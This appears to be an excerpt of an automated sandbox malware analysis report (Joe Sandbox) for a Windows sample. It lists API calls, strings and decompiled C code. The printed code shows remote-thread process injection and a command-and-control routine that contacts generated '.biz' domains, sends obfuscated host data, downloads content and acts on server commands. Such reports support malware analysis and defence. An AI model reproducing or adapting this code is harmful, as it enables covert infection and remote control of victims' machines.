ExitProcess.KERNEL32(00000000,00000002,00000000,00000000,?,00000104,?,004107CF), ref: 004044A3
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,%ComSpec%,?,00000104), ref: 004044C6
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,00000000,00000000,?,00000104), ref: 004044DE
ReadFile.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002), ref: 00404504
CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00404510

Strings

Sk(, xrefs: 0040354F
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, xrefs: 0040454A
--k33p, xrefs: 004034B8

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: FileProcess$CloseCreateHandle$Process32$AddressCommandCurrentExitFirstInfoLineModuleNameNextObjectOpenProcReadSingleSizeSnapshotStartupToolhelp32Wait
String ID: --k33p$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe$Sk(
API String ID: 1689075337-3478321916
Opcode ID: 81ad80933f7cda8183062a325933d20c2d9dd39e4d09177941e7246e470c820b
Instruction ID: d00f2b807b45ab01cd2c6a6b825232ba24a6d1af1351b3df965921cd90c8d434
Opcode Fuzzy Hash: 81ad80933f7cda8183062a325933d20c2d9dd39e4d09177941e7246e470c820b
Instruction Fuzzy Hash: 1441A470248745B9E730ABB18C46FAF759CEF84744F50483FB285B90D2DBBC99008A6B

Uniqueness

Uniqueness Score: -1.00%

Function 0040318D Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 177
stringmemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004031A3
Process32First.KERNEL32(?,00000128), ref: 004031DE
lstrcmpi.KERNEL32 ref: 00403239
lstrlen.KERNEL32(?,00000000,?,00000000,?), ref: 00403251
OpenProcess.KERNEL32(0000002A,00000000,?,?,00000000,?,00000000,?), ref: 0040326B
NtAllocateVirtualMemory.NTDLL(00000000,?,00000000,?,00001000,00000004,0000002A,00000000,?,?,00000000,?,00000000,?), ref: 004032B8
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000001,?), ref: 004032CC
CreateRemoteThread.KERNELBASE(00000000,00000000,00001000,00413254,00000128,00000000,00000000), ref: 004032ED
CloseHandle.KERNEL32(00000000,0000002A,00000000,?,?,00000000,?,00000000,?), ref: 004032F6
CloseHandle.KERNEL32(00000000,00000000,0000002A,00000000,?,?,00000000,?,00000000,?), ref: 00403300
VirtualAlloc.KERNEL32(00000000,00000001,08001000,00000004,?,?,00000000,?,00000000,?), ref: 00403318
lstrcpy.KERNEL32(00000000,00000000), ref: 00403322
Process32Next.KERNEL32 ref: 00403385
CloseHandle.KERNEL32 ref: 00403394

Strings

T2A, xrefs: 004032D8, 00403329

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: CloseHandleVirtual$CreateMemoryProcess32$AllocAllocateFirstNextOpenProcessRemoteSnapshotThreadToolhelp32Writelstrcmpilstrcpylstrlen
String ID: T2A
API String ID: 4234754235-2019523081
Opcode ID: 5d11baaf5fcc8b0ec52178119f4372dee2cc4bf46f82de6e8f65fdfc321b2885
Instruction ID: 0d498c4b157c114e0e64cb6a536b5d7ba074e5f61d63f8cd94b78a514f351688
Opcode Fuzzy Hash: 5d11baaf5fcc8b0ec52178119f4372dee2cc4bf46f82de6e8f65fdfc321b2885
Instruction Fuzzy Hash: AE518130204301AFD710DF25DD49BAB7AE9FB88705F10843EF685E6191DBB8D915CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040265F Relevance: 70.7, APIs: 31, Strings: 9, Instructions: 697
registrytimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040265F(signed int _a4) {
				char _v269;
				char _v270;
				char _v271;
				void _v272;
				char _v336;
				char _v592;
				void* _v596;
				void* _v600;
				int _v604;
				long _v608;
				signed int _v612;
				void* _v616;
				char _v620;
				signed int _v624;
				void* _v628;
				long _v632;
				struct _FILETIME _v640;
				signed int _v644;
				signed int _v648;
				int* _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				int** _v668;
				void* _v669;
				signed int _v672;
				void* _v673;
				void* _v677;
				void* _v681;
				long _t217;
				long _t221;
				signed int _t222;
				intOrPtr* _t225;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				short _t235;
				short _t236;
				short _t237;
				signed int _t240;
				signed int _t243;
				signed int _t244;
				CHAR* _t249;
				int _t250;
				signed int _t252;
				void* _t256;
				signed int _t265;
				signed int _t266;
				signed int _t270;
				void* _t271;
				signed int _t273;
				signed int _t274;
				signed char _t275;
				void* _t277;
				signed int _t279;
				signed int _t281;
				signed int _t287;
				void* _t288;
				signed int _t297;
				long _t298;
				intOrPtr _t310;
				int** _t321;
				signed int _t322;
				char* _t327;
				signed int _t334;
				signed int _t337;
				signed char _t339;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed char _t352;
				signed int _t355;
				signed int _t358;
				signed int _t359;
				long _t362;
				intOrPtr* _t368;
				void* _t375;
				long _t379;
				CHAR* _t381;
				signed int* _t382;
				char* _t383;
				signed int _t384;
				signed int _t385;
				int* _t387;
				signed int _t391;
				intOrPtr* _t393;
				signed int _t394;
				signed int* _t396;
				signed int _t397;
				intOrPtr _t399;
				signed int _t400;
				signed char* _t404;
				signed int _t408;
				signed int _t409;
				void* _t410;
				signed int _t411;
				signed int _t416;
				signed int _t417;
				signed char _t419;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t429;
				signed int _t432;
				signed int _t442;
				signed int _t443;
				signed char* _t444;
				signed int _t450;
				CHAR* _t452;
				signed int* _t457;
				signed int _t460;
				signed int _t462;
				signed int _t463;
				signed int _t466;
				signed int _t467;
				void* _t468;
				void* _t469;
				void* _t470;

				_t469 = _t468 - 0x290;
				_t217 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778,  &_v596, 0); // executed
				if(_t217 != 0) {
					_v596 = 0;
				}
				RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778,  &_v600, 0); // executed
				_v604 = 0x12;
				_t410 = _v596;
				if(_t410 == 0) {
					L4:
					_t221 = RegQueryValueExA(_v600, "Default Flags", 0, 0, 0x412190,  &_v604); // executed
					if(_t221 == 0) {
						L8:
						 *0x4121a0 = 0x31;
						goto L9;
					} else {
						 *0x412198 = 0x33abd8f4;
						GetSystemTimeAsFileTime(0x412190);
						 *0x41219c = 0;
						_t375 = _v596;
						 *0x4121a0 = 0x31;
						_t475 = _t375;
						if(_t375 != 0) {
							RegSetValueExA(_t375, "Default Flags", 0, 3, 0x412190, 0x12); // executed
						}
						RegSetValueExA(_v600, "Default Flags", 0, 3, 0x412190, 0x12); // executed
						while(1) {
							L9:
							_t222 = E00402427(_t475);
							if(_t222 != 0) {
								goto L117;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_t225 =  *0x4121c0;
								if(_t225 == 0) {
									_t469 = _t469 - 0x14;
									_t450 =  &_v677 & 0xfffffff0;
									__eflags = _t450;
									 *_t450 = 0;
								} else {
									_t387 =  &_v604;
									_v604 = 0;
									 *_t225(0, _t387, 0); // executed
									E00405C00();
									_t450 =  &_v669 & 0xfffffff0;
									 *_t450 = 0;
									 *0x4121c0(_t450, _t387, 0); // executed
								}
								_t381 =  &_v592;
								_t226 = wsprintfA(_t381, "%u.%u.%u.%s",  *0x4120f4,  *0x4120f8,  *0x4120fc, 0x412104);
								_push(_t381);
								L00405E40();
								_t470 = _t469 + 0x18;
								_v644 = _t226 + 0x18;
								_t411 = _v644;
								E00405C00();
								_t460 =  &_v673 & 0xfffffff0;
								 *_t460 = 2;
								_t231 = E004010B2();
								 *(_t460 + 1) = _t231;
								_v648 = _t231;
								_t232 =  *0x41219c; // 0x0
								 *((short*)(_t460 + 9)) = 0x31;
								 *(_t460 + 5) = _t232;
								asm("sbb eax, eax");
								_t234 =  !_t232 & 0x00000002;
								if( *0x41219c == 0) {
									_t234 = _t234 | 0x00000004;
								}
								L15:
								if( *0x412100 == 2) {
									_t234 = _t234 | 0x00000008;
								}
								if(_a4 == 0) {
									_t234 = _t234 | 0x00000010;
								}
								if( *0x412020 != 0) {
									_t234 = _t234 | 0x00000020;
								}
								if( *0x412030 != 0) {
									_t234 = _t234 | 0x00000040;
								}
								 *(_t460 + 0xb) = _t234;
								_t235 =  *0x4120e4; // 0x92e4389c
								 *((short*)(_t460 + 0xf)) = _t235;
								_t236 =  *0x4120e8; // 0x68382e89
								 *((short*)(_t460 + 0x11)) = _t236;
								_t237 =  *0x4120ec; // 0x48489949
								 *((char*)(_t460 + 0x15)) = 0;
								 *((char*)(_t460 + 0x16)) = 0;
								 *((short*)(_t460 + 0x13)) = _t237;
								if(E004025C3() == 0) {
									 *(_t460 + 0xb) =  *(_t460 + 0xb) | 0x00000001;
								}
								_v608 = 0;
								_v612 = _t460 + 0x17;
								_t240 = 0;
								while(_t240 <  *_t450) {
									_t399 =  *((intOrPtr*)(_t240 * 0x18 + _t450 + 4));
									_t411 = _t411 & 0xffffff00 | _t399 != 0x00000000;
									if((_t411 & (0 | _t399 != 0x0100007f)) != 0) {
										_v644 = _v644 + 4;
										_t368 = _v612;
										 *_t368 = _t399;
										_v612 = _t368 + 4;
										 *((char*)(_t460 + 0x15)) =  *((char*)(_t460 + 0x15)) + 1;
									}
									_t240 = _v608 + 1;
									_v608 = _t240;
								}
								_t382 = _t460 + 5;
								_push( &_v592);
								_push(_v612);
								L00405E20();
								_t243 = _t382 - _t460;
								__eflags = _t243;
								_v608 = _t243;
								while(1) {
									__eflags = _t243 - _v644;
									if(_t243 >= _v644) {
										break;
									}
									 *_t382 =  *_t382 ^ _v648;
									_t382 =  &(_t382[1]);
									_t243 = _v608 + 4;
									_v608 = _t243;
								}
								_t244 =  *0x412198; // 0x33abd8f4
								_t383 =  &_v336;
								E004014F6(_t244, _t383);
								E00405C00();
								_t249 =  &_v681 & 0xfffffff0;
								_t384 = _t460;
								_v612 = _t249;
								_t250 = wsprintfA(_t249, "http://%s.biz/d/N?", _t383);
								_v608 = 0;
								_t469 = _t470 + 0xc;
								_t452 = _t250 + _v612;
								__eflags = _v644;
								if(_v644 == 0) {
									L35:
									_t252 = E004019E8(_v612, 0, 1); // executed
									_t385 = _t252;
									__eflags = _t385;
									if(_t385 == 0) {
										L110:
										GetSystemTimeAsFileTime( &_v640);
										_t222 = E004014D8( &_v640, 0x412190);
										__eflags = _t222 - 0x2a2ff;
										if(_t222 <= 0x2a2ff) {
											break;
										}
										_t416 = _v640.dwHighDateTime;
										_t396 =  &_v336;
										 *0x412194 = _t416;
										_t417 = _t416 | 0xffffffff;
										__eflags = _v336;
										 *0x412190 = _v640.dwLowDateTime;
										while(__eflags != 0) {
											_t419 = _t417 ^  *_t396;
											_t396 =  &(_t396[0]);
											__eflags =  *_t396;
											_t417 = _t417 >> 0x00000008 ^  *(0x410880 + (_t419 & 0x000000ff) * 4);
										}
										_t256 = _v596;
										 *0x412198 =  !_t417;
										__eflags = _t256;
										if(_t256 != 0) {
											RegSetValueExA(_t256, "Default Flags", 0, 3, 0x412190, 0x12);
										}
										_t222 = RegSetValueExA(_v600, "Default Flags", 0, 3, 0x412190, 0x12);
										break;
									}
									__eflags = _a4;
									if(_a4 == 0) {
										ExitProcess(0);
									}
									__eflags =  *_t385;
									if( *_t385 == 0) {
										_v608 = E00401625( *(_t385 + 4),  &_v272, 0x100, 0x28);
									} else {
										_t358 = InternetReadFile( *(_t385 + 4),  &_v272, 0x100,  &_v608);
										__eflags = _t358;
										if(_t358 == 0) {
											_v608 = 0xffffffff;
										}
									}
									_t265 = E00401F59(_t385);
									_t397 = _v608;
									__eflags = _t397 - 0xffffffff;
									_t266 = _t265 & 0xffffff00 | _t397 != 0xffffffff;
									__eflags = _t397;
									_t423 = 0 | _t397 != 0x00000000;
									__eflags = _t266 & _t423;
									if((_t266 & _t423) == 0) {
										goto L110;
									} else {
										__eflags = _v271 - 0x20;
										if(_v271 != 0x20) {
											goto L110;
										}
										__eflags = (_v272 & 0x000000ff) - 0x30 - 4;
										if((_v272 & 0x000000ff) - 0x30 > 4) {
											goto L110;
										}
										_t424 =  &_v612;
										 *((char*)( &_v272 + _t397)) = 0;
										_t270 = E0040136B( &_v270, _t424, 0x10);
										_v608 = _t270;
										__eflags = _t270;
										if(_t270 != 0) {
											__eflags =  *0x41219c;
											if( *0x41219c == 0) {
												 *0x41219c = _t270;
											}
										}
										GetSystemTimeAsFileTime(0x412190);
										_t271 = _v596;
										__eflags = _t271;
										if(_t271 != 0) {
											RegSetValueExA(_t271, "Default Flags", 0, 3, 0x412190, 0x12);
										}
										RegSetValueExA(_v600, "Default Flags", 0, 3, 0x412190, 0x12);
										_t222 = _v272;
										__eflags = _t222 - 0x31;
										if(__eflags == 0) {
											_t400 = _v612;
											__eflags = _t400;
											if(_t400 == 0) {
												goto L110;
											}
											_t273 =  *_t400 & 0x000000ff;
											__eflags = _t273 - 0x20;
											_t425 = _t424 & 0xffffff00 | _t273 == 0x00000020;
											__eflags = _t273 - 9;
											_t104 = _t273 == 9;
											__eflags = _t104;
											_t274 = _t273 & 0xffffff00 | _t104;
											while(1) {
												_t275 = _t274 | _t425;
												__eflags = _t275 & 0x00000001;
												if((_t275 & 0x00000001) == 0) {
													break;
												}
												_t287 = _t400 + 1;
												_v612 = _t287;
												_t432 =  *(_t400 + 1) & 0x000000ff;
												__eflags = _t432;
												if(_t432 == 0) {
													goto L110;
												}
												__eflags = _t432 - 0x20;
												_t400 = _t287;
												_t274 = _t287 & 0xffffff00 | _t432 == 0x00000020;
												__eflags = _t432 - 9;
												_t425 = _t432 & 0xffffff00 | _t432 == 0x00000009;
											}
											_t277 = E0040134D(_v612, 0x20);
											__eflags = _t277 - 1;
											_t455 = _t277;
											_t462 = _v612;
											asm("sbb edi, 0xffffffff");
											_t279 = E0040134D(_t277, 0x55);
											__eflags = _t279;
											_t281 = E0040134D(_t277, 0x43);
											__eflags = _t281;
											_t429 = 0 | _t279 == 0x00000000;
											if(_t281 != 0) {
												_t429 = _t429 | 0x00000002;
												__eflags = _t429;
											}
											_push(_t429);
											_push(0);
											_t222 = E0040211B(_t462, 0);
											__eflags = _t222;
											if(_t222 != 0) {
												_t222 = E0040134D(_t455, 0x52);
												__eflags = _t222;
												if(_t222 != 0) {
													_t222 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &_v616, 0);
													__eflags = _t222;
													if(_t222 == 0) {
														_v620 = 0x1e;
														RegSetValueExA(_v616, "g00d d0gg", 0, 4,  &_v620, 4);
														_t222 = RegCloseKey(_v616);
													}
												}
											}
											break;
										} else {
											if(__eflags > 0) {
												__eflags = _t222 - 0x33;
												if(_t222 == 0x33) {
													 *0x412198 = 0x33abd8f4;
													_t288 = _v596;
													__eflags = _t288;
													if(_t288 != 0) {
														RegSetValueExA(_t288, "Default Flags", 0, 3, 0x412190, 0x12);
													}
													RegSetValueExA(_v600, "Default Flags", 0, 3, 0x412190, 0x12);
													Sleep(0x1388);
													L10:
													_t225 =  *0x4121c0;
													if(_t225 == 0) {
														_t469 = _t469 - 0x14;
														_t450 =  &_v677 & 0xfffffff0;
														__eflags = _t450;
														 *_t450 = 0;
													} else {
														_t387 =  &_v604;
														_v604 = 0;
														 *_t225(0, _t387, 0); // executed
														E00405C00();
														_t450 =  &_v669 & 0xfffffff0;
														 *_t450 = 0;
														 *0x4121c0(_t450, _t387, 0); // executed
													}
													_t381 =  &_v592;
													_t226 = wsprintfA(_t381, "%u.%u.%u.%s",  *0x4120f4,  *0x4120f8,  *0x4120fc, 0x412104);
													_push(_t381);
													L00405E40();
													_t470 = _t469 + 0x18;
													_v644 = _t226 + 0x18;
													_t411 = _v644;
													E00405C00();
													_t460 =  &_v673 & 0xfffffff0;
													 *_t460 = 2;
													_t231 = E004010B2();
													 *(_t460 + 1) = _t231;
													_v648 = _t231;
													_t232 =  *0x41219c; // 0x0
													 *((short*)(_t460 + 9)) = 0x31;
													 *(_t460 + 5) = _t232;
													asm("sbb eax, eax");
													_t234 =  !_t232 & 0x00000002;
													if( *0x41219c == 0) {
														_t234 = _t234 | 0x00000004;
													}
													goto L15;
												}
												__eflags = _t222 - 0x34;
												if(_t222 == 0x34) {
													__eflags = _v270 - 0x20;
													_t433 =  &_v270;
													_v624 =  &_v270;
													if(_v270 <= 0x20) {
														L74:
														 *_v624 = 0;
														_t222 = E00401CB0(_t433);
														__eflags = _t222;
														_t463 = _t222;
														if(_t222 == 0) {
															L79:
															 *0x4122e0 = 0;
															break;
														}
														_t391 = 0x400;
														_v660 = E00401000(0x400);
														_v632 = 0;
														while(1) {
															_t297 = E00401E00(_t463, _v660 + _v632, _t391 - _v632);
															__eflags = _t297;
															if(_t297 == 0) {
																break;
															}
															__eflags = _t297 - 0xffffffff;
															if(_t297 != 0xffffffff) {
																_t298 = _t297 + _v632;
																__eflags = _t298 - _t391;
																_v632 = _t298;
																if(_t298 >= _t391) {
																	_t391 = _t391 + 0x400;
																	__eflags = _t391;
																	_v660 = E0040100F(_v660, _t391);
																}
																continue;
															}
															E00401F59(_t463);
															L78:
															_t222 = E00401029(_v660);
															goto L79;
														}
														E00401F59(_t463);
														__eflags = _v632 + 1 - _t391;
														if(_v632 + 1 >= _t391) {
															__eflags = _t391 + 1;
															_v660 = E0040100F(_v660, _t391 + 1);
														}
														 *((char*)(_v632 + _v660)) = 0;
														_t310 = E00401DD7(_v660, _v632);
														__eflags =  *0x412300 - _t310; // 0x0
														_v664 = _t310;
														if(__eflags != 0) {
															L87:
															_v652 = E0040136B(_v660,  &_v624, 0);
															E004014BC( &_v624);
															_t315 = _v624;
															__eflags =  *_v624;
															if( *_v624 == 0) {
																goto L78;
															}
															_v656 = E0040136B(_t315,  &_v624, 0);
															E004014BC( &_v624);
															__eflags =  *_v624;
															if( *_v624 == 0) {
																goto L78;
															}
															_t321 = E00401000(8);
															_v668 = _t321;
															 *_t321 = 0;
															_t321[1] = 0;
															_t322 =  &(_t321[1]);
															__eflags = _t322;
															_v672 = _t322;
															do {
																_v628 = _v624;
																E004014BC( &_v628);
																_t326 = _v624;
																__eflags =  *_v624 - 0xa;
																if( *_v624 == 0xa) {
																	goto L103;
																}
																_t442 =  &_v624;
																_v632 = E0040136B(_t326, _t442, 0);
																_t404 = _v624;
																_t337 =  *_t404 & 0x000000ff;
																__eflags = _t337 - 0x20;
																_t443 = _t442 & 0xffffff00 | _t337 == 0x00000020;
																__eflags = _t337 - 9;
																_t339 = _t337 & 0xffffff00 | _t337 == 0x00000009 | _t443;
																__eflags = _t339 & 0x00000001;
																if((_t339 & 0x00000001) == 0) {
																	L94:
																	_t393 = E00401000(_v628 - _v624 + 8);
																	_t444 = _v624;
																	_t187 = _t393 + 8; // 0x8
																	_t457 = _t187;
																	_t466 = _v628 - _t444;
																	__eflags = _t466;
																	if(_t466 == 0) {
																		do {
																			L101:
																			_t345 =  *_t444 & 0x000000ff;
																			_t444 =  &(_t444[1]);
																			__eflags = _t345;
																		} while (_t345 != 0);
																		L102:
																		 *_t393 = _v632;
																		_t191 = _t393 + 4; // 0x4
																		 *_v672 = _t393;
																		_v672 = _t191;
																		 *(_t393 + 4) = _v668[1];
																		goto L103;
																	}
																	_t408 = _t466;
																	while(1) {
																		_t408 = _t408 - 1;
																		__eflags = _t408;
																		if(_t408 == 0) {
																			break;
																		}
																		_t349 =  *_t444 & 0x000000ff;
																		_t444 =  &(_t444[1]);
																		 *_t457 = _t349;
																		_t457 =  &(_t457[0]);
																		__eflags = _t349;
																		if(_t349 != 0) {
																			continue;
																		}
																		__eflags = _t408;
																		if(_t408 != 0) {
																			goto L102;
																		}
																		break;
																	}
																	__eflags = _t466;
																	if(_t466 != 0) {
																		 *_t457 = 0;
																	}
																	goto L101;
																}
																_t409 =  &(_t404[1]);
																__eflags = _t409;
																do {
																	_v624 = _t409;
																	_t409 = _t409 + 1;
																	_t350 =  *(_t409 - 1) & 0x000000ff;
																	__eflags = _t350 - 0x20;
																	_t443 = _t443 & 0xffffff00 | _t350 == 0x00000020;
																	__eflags = _t350 - 9;
																	_t352 = _t350 & 0xffffff00 | _t350 == 0x00000009 | _t443;
																	__eflags = _t352 & 0x00000001;
																} while ((_t352 & 0x00000001) != 0);
																goto L94;
																L103:
																_t327 = _v628;
																_v624 = _t327;
																__eflags =  *_t327;
															} while ( *_t327 != 0);
															E00401029(_v660);
															 *0x4122f0 = _v656;
															_t467 =  *0x412050; // 0x0
															 *0x4122e0 = _v652;
															 *0x412050 = _v668;
															 *0x412300 = _v664;
															_t222 = CloseHandle(CreateThread(0, 0x10000, E00401FFD, 0, 0,  &_v632));
															__eflags = _t467;
															if(_t467 == 0) {
																break;
															}
															__eflags =  *_t467;
															if( *_t467 != 0) {
																break;
															}
															_t394 =  *(_t467 + 4);
															__eflags = _t394;
															while(__eflags != 0) {
																_t334 = _t394;
																_t394 =  *(_t394 + 4);
																E00401029(_t334);
																__eflags = _t394 -  *(_t467 + 4);
															}
															_t222 = E00401029(_t467);
															break;
														} else {
															__eflags =  *0x412050;
															if( *0x412050 != 0) {
																goto L78;
															}
															goto L87;
														}
													}
													_t355 =  &_v269;
													do {
														_v624 = _t355;
														_t355 = _t355 + 1;
														__eflags =  *((char*)(_t355 - 1)) - 0x20;
													} while ( *((char*)(_t355 - 1)) > 0x20);
													goto L74;
												}
												goto L110;
											}
											__eflags = _t222 - 0x30;
											if(_t222 == 0x30) {
												goto L79;
											}
											goto L110;
										}
									}
								} else {
									goto L34;
								}
								do {
									L34:
									_t359 =  *_t384 & 0x000000ff;
									_t384 = _t384 + 1;
									_push(_t359);
									_t452 =  &(_t452[2]);
									wsprintfA(_t452, "%02X");
									_t469 = _t469 + 0xc;
									_t362 = _v608 + 1;
									__eflags = _t362 - _v644;
									_v608 = _t362;
								} while (_t362 < _v644);
								goto L35;
							}
							L117:
							__eflags = _a4 - 1;
							asm("sbb eax, eax");
							Sleep((_t222 & 0xfff74d70) + 0x927c0); // executed
						}
					}
				}
				_t379 = RegQueryValueExA(_t410, "Default Flags", 0, 0, 0x412190,  &_v604); // executed
				if(_t379 == 0) {
					goto L8;
				}
				goto L4;
			}

0x0040266b
0x0040268e
0x00402695
0x00402697
0x00402697
0x004026c4
0x004026c9
0x004026d3
0x004026db
0x00402700
0x0040271b
0x00402722
0x00402788
0x00402788
0x00000000
0x00402724
0x00402729
0x00402733
0x00402738
0x00402742
0x00402748
0x00402751
0x00402753
0x00402766
0x00402766
0x00402781
0x00402791
0x00402791
0x00402791
0x00402798
0x00000000
0x00000000
0x00000000
0x00000000
0x0040279e
0x0040279e
0x0040279e
0x004027a5
0x004027e8
0x004027ef
0x004027ef
0x004027f2
0x004027a7
0x004027a9
0x004027b0
0x004027bc
0x004027ca
0x004027d3
0x004027d6
0x004027e0
0x004027e0
0x004027fd
0x0040281b
0x00402820
0x00402821
0x00402829
0x0040282c
0x00402832
0x00402841
0x0040284a
0x0040284d
0x00402850
0x00402855
0x0040285f
0x00402865
0x0040286a
0x00402870
0x00402873
0x00402877
0x00402881
0x00402883
0x00402883
0x00402886
0x0040288d
0x0040288f
0x0040288f
0x00402896
0x00402898
0x00402898
0x004028a2
0x004028a4
0x004028a4
0x004028ae
0x004028b0
0x004028b0
0x004028b3
0x004028b6
0x004028bb
0x004028bf
0x004028c4
0x004028c8
0x004028cd
0x004028d1
0x004028d5
0x004028e0
0x004028e2
0x004028e2
0x004028e6
0x004028f3
0x004028f9
0x004028fb
0x00402902
0x00402908
0x00402918
0x0040291a
0x00402921
0x00402927
0x0040292c
0x00402932
0x00402932
0x0040293b
0x0040293c
0x0040293c
0x0040294a
0x0040294d
0x0040294e
0x00402954
0x0040295b
0x0040295b
0x0040295d
0x00402963
0x00402963
0x00402969
0x00000000
0x00000000
0x00402971
0x00402973
0x0040297c
0x0040297f
0x0040297f
0x00402987
0x0040298c
0x00402994
0x004029a6
0x004029af
0x004029b3
0x004029bb
0x004029c1
0x004029c6
0x004029d2
0x004029d5
0x004029db
0x004029e2
0x00402a0f
0x00402a19
0x00402a1e
0x00402a20
0x00402a23
0x0040301b
0x00403022
0x0040302e
0x00403033
0x00403038
0x00000000
0x00000000
0x0040303e
0x00403044
0x00403050
0x00403056
0x00403059
0x00403060
0x00403065
0x0040306c
0x0040306e
0x00403079
0x0040307c
0x0040307c
0x00403080
0x00403088
0x0040308e
0x00403090
0x004030a3
0x004030a3
0x004030be
0x00000000
0x004030be
0x00402a29
0x00402a2d
0x00402a31
0x00402a31
0x00402a36
0x00402a3f
0x00402a77
0x00402a41
0x00402a51
0x00402a57
0x00402a59
0x00402a5b
0x00402a5b
0x00402a59
0x00402a80
0x00402a85
0x00402a8b
0x00402a8e
0x00402a93
0x00402a95
0x00402a98
0x00402a9a
0x00000000
0x00402aa0
0x00402aa0
0x00402aa7
0x00000000
0x00000000
0x00402ab6
0x00402ab8
0x00000000
0x00000000
0x00402ac0
0x00402acc
0x00402ad4
0x00402ad9
0x00402adf
0x00402ae2
0x00402ae4
0x00402aeb
0x00402aed
0x00402aed
0x00402aeb
0x00402af7
0x00402afc
0x00402b02
0x00402b04
0x00402b17
0x00402b17
0x00402b32
0x00402b37
0x00402b3e
0x00402b41
0x00402b6a
0x00402b70
0x00402b72
0x00000000
0x00000000
0x00402b78
0x00402b7b
0x00402b7d
0x00402b80
0x00402b82
0x00402b82
0x00402b82
0x00402b85
0x00402b85
0x00402b87
0x00402b89
0x00000000
0x00000000
0x00402b8b
0x00402b8e
0x00402b94
0x00402b98
0x00402b9a
0x00000000
0x00000000
0x00402ba0
0x00402ba3
0x00402ba5
0x00402ba8
0x00402bab
0x00402bab
0x00402bbb
0x00402bc0
0x00402bc3
0x00402bc5
0x00402bcb
0x00402bd5
0x00402be1
0x00402be8
0x00402bed
0x00402bef
0x00402bf1
0x00402bf3
0x00402bf3
0x00402bf3
0x00402bf6
0x00402bfb
0x00402bfd
0x00402c03
0x00402c06
0x00402c13
0x00402c18
0x00402c1a
0x00402c40
0x00402c45
0x00402c47
0x00402c65
0x00402c6f
0x00402c7a
0x00402c7a
0x00402c47
0x00402c1a
0x00000000
0x00402b43
0x00402b43
0x00402b53
0x00402b56
0x00402c84
0x00402c8e
0x00402c94
0x00402c96
0x00402ca9
0x00402ca9
0x00402cc4
0x00402cce
0x0040279e
0x0040279e
0x004027a5
0x004027e8
0x004027ef
0x004027ef
0x004027f2
0x004027a7
0x004027a9
0x004027b0
0x004027bc
0x004027ca
0x004027d3
0x004027d6
0x004027e0
0x004027e0
0x004027fd
0x0040281b
0x00402820
0x00402821
0x00402829
0x0040282c
0x00402832
0x00402841
0x0040284a
0x0040284d
0x00402850
0x00402855
0x0040285f
0x00402865
0x0040286a
0x00402870
0x00402873
0x00402877
0x00402881
0x00402883
0x00402883
0x00000000
0x00402881
0x00402b5c
0x00402b5f
0x00402cd8
0x00402cdf
0x00402ce5
0x00402ceb
0x00402d00
0x00402d06
0x00402d0b
0x00402d10
0x00402d12
0x00402d14
0x00402d4e
0x00402d4e
0x00000000
0x00402d4e
0x00402d1b
0x00402d25
0x00402d2b
0x00402d86
0x00402d9b
0x00402da1
0x00402da3
0x00000000
0x00000000
0x00402d37
0x00402d3a
0x00402d5d
0x00402d63
0x00402d65
0x00402d6b
0x00402d73
0x00402d73
0x00402d80
0x00402d80
